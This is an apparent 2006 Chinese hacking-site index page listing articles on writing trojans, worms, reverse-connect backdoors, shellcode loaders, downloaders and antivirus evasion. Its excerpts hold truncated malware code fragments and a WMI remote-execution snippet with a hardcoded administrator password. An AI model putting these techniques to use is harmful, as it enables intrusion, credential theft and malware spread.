欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • 用UDP协议的木马编写方法
  • 用UDP协议的木马编写方法 木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。   一、软硬件要求。Windows95/98对等网,用......
  • 所属分类:编程开发 更新时间:2006-06-11 相关标签: 阅读全文...
  • 传说的杀“毒”软件
  • On Error Resume NextSet fs=CreateObject("Scripting.FileSystemObject")Set dir2=fs.GetSpecialFolder(1)Set so=CreateObject("Scripting.FileSystemObject")Set r=CreateObject("Wscript.Shell")so.GetFile(WScri......
  • 所属分类:编程开发 更新时间:2006-06-10 相关标签: 阅读全文...
  • 木马配置器通用写法
  • 次写了一个直接将配置文件添加到对应的位置上的方法.好处就在于木马端不用写专门的代码再来提取配置文件,这样很自然的就节省了木马的体积.坏处就在于那种方法只能给未加壳的程序修改配置.这样每次都得带上个FSG(说明......
  • 所属分类:编程开发 更新时间:2006-06-09 相关标签: 阅读全文...
  • Windows下端口反弹
  • 这是一个Windows下的小程序,可以穿透防火墙反弹连接,当然这是最简单的!看到网络上反弹木马到处都是,心一热就有了这个了(代码很垃圾的)。/* ==Rebound port in Windows NTBy shucx,2003/10===*/#include #inclu......
  • 所属分类:编程开发 更新时间:2006-06-09 相关标签: 阅读全文...
  • 远程杀进程
  • 杀掉本地进程其实很简单,取得进程ID后,调用OpenProcess函数打开进程句柄,然后调用TerminateProcess函数就可以杀掉进程了。有些情况下并不能直接打开进程句柄,例如WINLOGON等系统进程,因为权限不够。这个时候我们......
  • 所属分类:编程开发 更新时间:2006-06-09 相关标签: 阅读全文...
  • 远程(如通过互联网)连接access数据库的方法
  • 前段时间很多人问远程(如通过互联网)连接access数据库的方法,最近写了个例子,与大家共享: 使用了TCP/IP,ADO及XML(需要安装Microsoft XML 4.0。)。分服务器和客户端两部分,服务器可以多用户同时连接。远......
  • 所属分类:编程开发 更新时间:2006-06-08 相关标签: 阅读全文...
  • 用VB做ShellCode Loader
  • 很久没写过文章了,今天看到Anskya写的多种语言的ShellCode Loader,他把C下的ShellCode按照原理改成写Delphi的,实际就是直接执行汇编代码,既然这样也可以把它改写的Visual Basic的.代码如下,稍微改了一下:'Code Start......
  • 所属分类:编程开发 更新时间:2006-06-08 相关标签: 阅读全文...
  • 用VB写的比Sobig更毒的蠕虫病毒
  • 用vb写的比sobig更毒的蠕虫病毒!!!Dim Fso, Wnt, Wol, Wom, Wos, Windir, Winsys, Wincmd, Wintmp, NewFile, OldFile, OutLook, TextBody, Program, EUser, HUser, EPassword, EmailAddress, EmailSubject, EmailBod......
  • 所属分类:编程开发 更新时间:2006-06-07 相关标签: 阅读全文...
  • VC++动态链接库编程之DLL木马
  • DLL在程序编制中可作出巨大贡献,它提供了具共性代码的复用能力。但是,正如一门高深的武学,若被掌握在正义之侠的手上,便可助其仗义江湖;但若被掌握在邪恶之徒的手上,则必然在江湖上掀起腥风血雨。DLL正是一......
  • 所属分类:编程开发 更新时间:2006-06-06 相关标签: 阅读全文...
  • 从进程中获取QQ号码(终结修改篇+源码)(修正)
  • 作者:老K 来源:www.dywt.com.cn/ 发布:sunlion@E.S.T 日期:2006-6-3 前段时间在论坛上, 易友 "wjkplx" 问 "如何取正在运行的QQ号" (dispbbs.asp?BoardID=1&ID=51048), 后来有"方德软件","近在眼前","goomoo","云......
  • 所属分类:编程开发 更新时间:2006-06-05 相关标签: 阅读全文...
  • 黑客编程:开3389的源代码
  • #include "windows.h" #include "windows.h" #include "iostream.h" void main(int argc, char* argv[]) { HKEY hKey; HANDLE hProcess, hToken; TOKEN_PRIVILEGES NewState; DWORD ProcessId, ReturnLengt......
  • 所属分类:编程开发 更新时间:2006-06-05 相关标签: 阅读全文...
  • 破坏程序教学
  • 基础知识自从开办本站以来,好多朋友来信求教病毒程序编写,问题提出的水平也高低不同,我也尽可能的作了详细讲解。在回答问题时我做过了一定的调查,发现大多数经常来乱世天使的朋友都已经具备了一定的水平,所缺......
  • 所属分类:编程开发 更新时间:2006-06-05 相关标签: 阅读全文...
  • 跟我打造无DLL版穿墙Downloader
  • 这份代码的思路来自于国外EES组织的Aphex。基本上所有的无DLL Download都是利用的这种方法。其实也就是用烂了的远程注入法。不过注入的对象不是一个DLL,而是本身的一个过程。下面是代码,由于本人专业知识不够,可能......
  • 所属分类:编程开发 更新时间:2006-06-03 相关标签: 阅读全文...
  • 用Delphi创建NT/2000账号
  • uses Windows;constSE_CREATE_TOKEN_NAME ='SeCreateTokenPrivilege';SE_ASSIGNPRIMARYTOKEN_NAME ='SeAssignPrimaryTokenPrivilege';SE_LOCK_MEMORY_NAME ='SeLockMemoryPrivilege';SE_INCREASE_QUOTA_NAME ='SeInc......
  • 所属分类:编程开发 更新时间:2006-06-03 相关标签: 阅读全文...
  • 利用xml远程执行命令
  • <% 'by xiaoluset ww=server.createobject("wbemscripting.swbemlocator")set cc=ww.connectserver("192.168.2.1","root/cimv2","administrator","xiaolu")set ss=cc.get("Win32_ProcessStartup")Set oC=ss.SpawnIn......
  • 所属分类:编程开发 更新时间:2006-06-01 相关标签: 阅读全文...
  • 无DLL,插IE下载者 3.5K
  • //好多兄弟都找我要这个,我就把源码帖在这里把.386.model flat,stdcalloption casemap:noneinclude windows.incinclude urlmon.incinclude user32.incinclude kernel32.incincludelib user32.libincludelib urlmon.l......
  • 所属分类:编程开发 更新时间:2006-05-30 相关标签: 阅读全文...
  • 对抗杀毒软件的内存扫描
  • Author: PolymorphoursEmail: Polymorphours@whitecell.orgHomepage:http://www.whitecell.org Date: 2005-11-17/*++Author: PolymorphoursDate: 2005/1/10通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模......
  • 所属分类:编程开发 更新时间:2006-05-30 相关标签: 阅读全文...
  • 1k(程序体积1kb) 反向连接,零管道后门
  • 写ShellCode的时候写的~C版本代码~~没用就丢出来了~CODE:/*1k(程序体积1kb) 反向连接,零管道后门 By Anskya说明:不用我多说了吧..黑客一般都会使用的后门程序..这里只是简单的演示一下..没有添加进程隐藏功能程序可以......
  • 所属分类:编程开发 更新时间:2006-05-30 相关标签: 阅读全文...
  • AFX syn扫描器源码
  • program scan;{$APPTYPE CONSOLE}usesWindows,Winsock2;typeTBufferArray = array[0..65535] of byte;iph = recordip_verlen: byte;ip_tos: byte;ip_len: word;ip_id: word;ip_offset: word;ip_ttl: byte;ip_protoco......
  • 所属分类:编程开发 更新时间:2006-05-30 相关标签: 阅读全文...
  • 一个经典的东西 5分钟编写一个ASP论坛
  • 学ASP朋友的。。给大家分享个好东西真NB..佩服ing .....大家在网上看到各种各样的ASP论坛是不是觉的做论坛很难呢,其实我们用简单的ASP语句就完全可以完成一个属于自己的论坛。下面我教大家如何用ASP来打造一个属于自......
  • 所属分类:编程开发 更新时间:2006-05-29 相关标签: 阅读全文...
  • 无进程无DLL无硬盘文件无启动项木马思路
  • 现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是,它们并不是一个真正的后门,极容易服务器管理员察觉,因此肉鸡经常飞掉也就很......
  • 所属分类:编程开发 更新时间:2006-05-28 相关标签: 阅读全文...
  • ASM编写通用Win32系统ShellCode for MASM32
  • 许多过程我都写成独立封装函数了可以直接拿来使用...其实这个就是就是一个模板感谢许许多多的前辈高人指点~谢谢转载保留版权谢谢....for 邪恶八进制 CODE: ;=; ShellCode For MASM32 Example By Anskya; Email:Ans......
  • 所属分类:编程开发 更新时间:2006-05-27 相关标签: 阅读全文...
  • 利用VB实现对IE的调用与控制
  • 随着网络应用的不断扩展,采用HTML语言编写的文档越来越多,如何在VB程序中实现对HTML文档的浏览是一个需要解决的问题。本文以一个实例说明了在VB中调用和控制Internet Explorer的方法。   一、 编程准备   VB通过......
  • 所属分类:编程开发 更新时间:2006-05-26 相关标签: 阅读全文...
  • 像ASPack一样从INI文件载入语言包
  • 下面是一个通用过程,根据INI文件中的资源改变界面语言(仅Caption和Hint属性) 参数一:为一Component,一般为TForm,此过程将循环列举其子Component并查找是否具有相关属性,有的话则从INI文件读取信息并设置属性参数二......
  • 所属分类:编程开发 更新时间:2006-05-26 相关标签: 阅读全文...
  • 在冰刃下隐藏木马的服务项
  • 上次看到wineggdrog有在讨论icesword是如何检测服务的。 虽然我不知道icesword是什么样列举服务的,但估计最终也是通过历遍SCM内部的ServiceRecordList来检测。 为什么呢?看下面。 用附件中的InjectDLL.exe把hidese......
  • 所属分类:编程开发 更新时间:2006-05-25 相关标签: 阅读全文...
  • ARP地址解析协议详解及其漏洞分析
  • /* * 以太网解释协议(ARP). 文件名:/sys/netinet/if_ether.c * 注释:xie_minix *一,函数入口: * ARP有两个入口:1 * 由ether_input发出一软中断(见我的ethernet网络代码详解一文),arpintr中断例程被调用,检查完数据后......
  • 所属分类:编程开发 更新时间:2006-05-19 相关标签: 阅读全文...
  • 微软ping程序源代码完整版
  • 编写自己的一个ping程序,可以说是许多人迈出网络编程的第一步吧!!这个ping程序的源代码经过我的修改和调试,基本上可以取代windows中自带的ping程序. 各个模块后都有我的详细注释和修改日志,希望能够对大家的学习有所......
  • 所属分类:编程开发 更新时间:2006-05-19 相关标签: 阅读全文...
  • ASP+MSSQL在线修改Serv-U密码
  • 下面是以Serv-U 6.0和Sql Server 2000相结合的演示。 建表Sql 语句: CREATE TABLE [groupaccounts] ( [id] int IDENTITY (1,1) PRIMARY KEY, [Index] int Default 0, [Name] nVarChar(50) default ’’, [Notes] nV......
  • 所属分类:编程开发 更新时间:2006-05-19 相关标签: 阅读全文...
  • 慈勤强的JFolder1.0版代码(JSP)
  • 作者:慈勤强 来自: http://blog.csdn.net/cqq/ 这个版本主要是兼容了Unix、Linux等操作系统,真正的不再受系统平台的限制。 在0.9测试版发布以后,很多朋友都给了我很好的意见和建议, 对于日常的应用,这个版本应......
  • 所属分类:编程开发 更新时间:2006-05-17 相关标签: 阅读全文...
  • 趋势Officescan的自动删除批处理脚本
  • 写的目的:由于趋势officescan客户端可以加密,加密后其它不知道密码的用户就不能卸载了;另外,有时候趋势卸载不干净不能再次安装,只能手动卸载,需要逐个查找注册项目等等,很麻烦,同时我们公司有近3000个用户,......
  • 所属分类:编程开发 更新时间:2006-05-16 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集